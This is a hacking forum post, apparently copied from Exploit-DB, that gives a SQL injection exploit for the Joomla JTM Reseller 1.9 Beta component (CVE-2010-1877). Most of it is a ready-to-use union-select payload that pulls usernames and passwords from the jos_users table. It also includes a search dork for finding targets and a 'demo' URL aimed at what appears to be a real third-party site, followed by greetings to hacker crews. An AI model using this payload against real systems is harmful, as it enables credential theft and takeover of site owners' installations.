Exploit Joomla! Component JTM Reseller 1.9 Beta - SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12306
Проверка EDB
  1. Пройдено
Автор
KAMTIEZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-1877
Дата публикации
2010-04-20
Код: 
[!]===========================================================================[!]

[~] Joomla Component JTM Reseller SQL injection vulnerability 
[~] Author	: kaMtiEz ([email protected])
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 20 april, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.jtmreseller.com/index.php?option=com_jtm&view=search&view=search&author=
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.jtmreseller.com/index.php?option=com_content&view=article&id=2&Itemid=4
[+] Version : 1.9 Beta


[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_jtm&view=search&view=search&author=[INDONESIANCODER]

[ XpL ]

-666/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search

[ d3m0 ]

http://999k.idv.tw/index.php?option=com_jtm&view=search&author=-666/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4


[ NOTE ] 

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
[+] jika kami bersama nyalakan tanda bahaya :)
[+] Ayy : Ceped sembuh bebh .. lup u :">
[+] Don Tukulesto and Acild : thanks for coming in my t0wn :D

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Ответы
0
Просмотры
849
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
Ответы
0
Просмотры
856
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Ответы
0
Просмотры
932
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
Ответы
0
Просмотры
911
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Ответы
0
Просмотры
908
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection
Ответы
0
Просмотры
901
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component NeoRecruit 4.1 - SQL Injection
Ответы
0
Просмотры
904
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Ответы
0
Просмотры
914
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
902
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Ответы
0
Просмотры
823
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу